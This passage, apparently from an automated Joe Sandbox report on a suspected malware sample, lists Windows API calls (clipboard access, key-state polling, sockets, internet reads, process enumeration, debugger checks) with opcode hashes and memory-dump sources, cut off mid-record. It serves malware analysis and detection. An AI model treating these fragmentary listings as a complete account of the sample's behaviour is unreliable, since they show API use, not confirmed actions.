                                                                                                                • Opcode Fuzzy Hash: 40fd759e06795c51c6d44f44d3c5b8b210a1b9c9a66bbae5e363e359e7067c76
                                                                                                                • Instruction Fuzzy Hash: A562C131E0466A8BDF24CFA8D8402EEB7B1FF55310F95816BD811AB381D7784A46CB99
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00423462: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,0041BD80,00000000,00000000,00000000,00000002,00000000,00000000), ref: 004234A4
                                                                                                                  • Part of subcall function 00423462: GetLastError.KERNEL32(?,0041BD80,00000000,00000000,00000000,00000002,00000000,00000000,00000000,?,0041C46E,00000000,00000002,00000000,0048CB40,00000010), ref: 004234B1
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E,00000109,00000109), ref: 00426E0A
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E,00000109,00000109), ref: 00426E11
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E), ref: 00426E8D
                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E,00000109), ref: 00426E94
                                                                                                                • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E), ref: 00426EEF
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,77023140,00000109,00000000,?,?,0042598E,00000109), ref: 00426F1C
                                                                                                                Similarity
                                                                                                                • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 1354853467-0
                                                                                                                • Opcode ID: c77f5c4fbdd969b6395b23d28f869cdae7d1fae00b5a1ae8a4ef132f81dfdc60
                                                                                                                • Instruction ID: 42e05f79c57693437edf2df5a3fd70b8e7b48e5887b3da35eff89abe1339f9d1
                                                                                                                • Opcode Fuzzy Hash: c77f5c4fbdd969b6395b23d28f869cdae7d1fae00b5a1ae8a4ef132f81dfdc60
                                                                                                                • Instruction Fuzzy Hash: 8A410676A00125AEDF102FB8EC466AE7B75EF00324F57462AF934972A0D77C4D518B98
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNextSleep
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1749430636-438819550
                                                                                                                • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                APIs
                                                                                                                • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                • CloseClipboard.USER32 ref: 0046C692
                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                • CloseClipboard.USER32 ref: 0046C866
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 589737431-2761332787
                                                                                                                • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                                                • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 4170576061-0
                                                                                                                • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                                                • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3539004672-0
                                                                                                                • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                                • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                • IsWindowVisible.USER32 ref: 00477314
                                                                                                                • IsWindowEnabled.USER32 ref: 00477324
                                                                                                                • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                                • IsIconic.USER32 ref: 0047733F
                                                                                                                • IsZoomed.USER32 ref: 0047734D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                                • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                                                • GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2579439406-0
                                                                                                                • Opcode ID: 1e849d302d6523c4eca3589611bb7f1730917824b3e599ff67baae63fbfc1711
                                                                                                                • Instruction ID: 1e353620185c301eaa467651b296c472c2ab582025bec62c778f005c55eb3537
                                                                                                                • Opcode Fuzzy Hash: 1e849d302d6523c4eca3589611bb7f1730917824b3e599ff67baae63fbfc1711
                                                                                                                • Instruction Fuzzy Hash: 0A31D4B09013289BCB60DF65DD897C9BBB8AF18304F5045EEE50CA6251DBB85FC48F08
                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004223F3
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004223FF
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00422407
                                                                                                                • GetTickCount.KERNEL32 ref: 0042240F
                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 0042241B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                • String ID:
                                                                                                                • API String ID: 1445889803-0
                                                                                                                • Opcode ID: f5f58df8b3066ca0205ef19db65b763b05621757b61e1ba64a9c786d5d6483bf
                                                                                                                • Instruction ID: fccd6c2f0e9de14ca193dd89c54efe282b2f985546ae9d4e91778ab0a4262a43
                                                                                                                • Opcode Fuzzy Hash: f5f58df8b3066ca0205ef19db65b763b05621757b61e1ba64a9c786d5d6483bf
                                                                                                                • Instruction Fuzzy Hash: 94115672E00124ABCB209BB4EE4855FB7F4FF58351F920976DD01E7210DAB49D00C798
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,77023220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 3397143404-0
                                                                                                                • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                                                  • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                                                  • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                                                  • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                                                  • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                                                                • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                                                                  • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                  • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharExceptionFilterMultiProcessUnhandledWide$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone
                                                                                                                • String ID: S\
                                                                                                                • API String ID: 4226027050-393906132
                                                                                                                • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                                • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                                                                • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                                • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                                                                APIs
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                • String ID:
                                                                                                                • API String ID: 420147892-0
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                                                • API String ID: 0-2165971703
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: DEFINE$`$h$h
                                                                                                                • API String ID: 0-4194577831
                                                                                                                APIs
                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: mouse_event
                                                                                                                • String ID: DOWN
                                                                                                                • API String ID: 2434400541-711622031
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 3541575487-0
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                                                • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 48322524-0
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ACCEPT$^$h
                                                                                                                • API String ID: 0-4263704089
                                                                                                                APIs
                                                                                                                • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                Similarity
                                                                                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 901099227-0
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004231F1
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 004231FE
                                                                                                                  • Part of subcall function 004180A7: GetModuleFileNameA.KERNEL32(00000000,00496789,00000104,?,00411739,?,00401C0B), ref: 0041814A
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 787209826-0
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                                                • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0vH$HH
                                                                                                                • API String ID: 0-728391547
                                                                                                                • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                                • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %
                                                                                                                • API String ID: 0-2567322570
                                                                                                                • Opcode ID: ad9d9e4ed856bbc1a1f5a44e896685112ab95b057e4e2b96676990c2cb68e2ac
                                                                                                                • Instruction ID: 2fa34336e9ef0fe885d9d5dd6ffb055e1532136e8e970563a654dda37c491d5c
                                                                                                                • Opcode Fuzzy Hash: ad9d9e4ed856bbc1a1f5a44e896685112ab95b057e4e2b96676990c2cb68e2ac
                                                                                                                • Instruction Fuzzy Hash: 54829C708083458FDB558F34C898AC9BB71FF8A324F15C1EAC4489F667D3385A86DBA5
                                                                                                                APIs
                                                                                                                • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Proc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2346855178-0
                                                                                                                • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 3gB
                                                                                                                • API String ID: 0-1795317511
                                                                                                                • Opcode ID: 6da754253abd2e35eb2e5a274ee4f9ff3dc2e5057a81817226e1356d575d6b11
                                                                                                                • Instruction ID: 325a13a96c06d4c98cee853255adfbe26994b6972aee23e03a37be849d38a260
                                                                                                                • Opcode Fuzzy Hash: 6da754253abd2e35eb2e5a274ee4f9ff3dc2e5057a81817226e1356d575d6b11
                                                                                                                • Instruction Fuzzy Hash: 25228B31E08229CBDF24CFA8E4503EDBBB1FB55314FA4816BD841AB385D7785882DB59
                                                                                                                APIs
                                                                                                                • RaiseException.KERNEL32(?,00000000,00000001,?,00000000,0000FFFF,?,?,0041DA4A,?,?,?,?,?,0041DDE3,00000000), ref: 0041D974
                                                                                                                Memory Dump Source
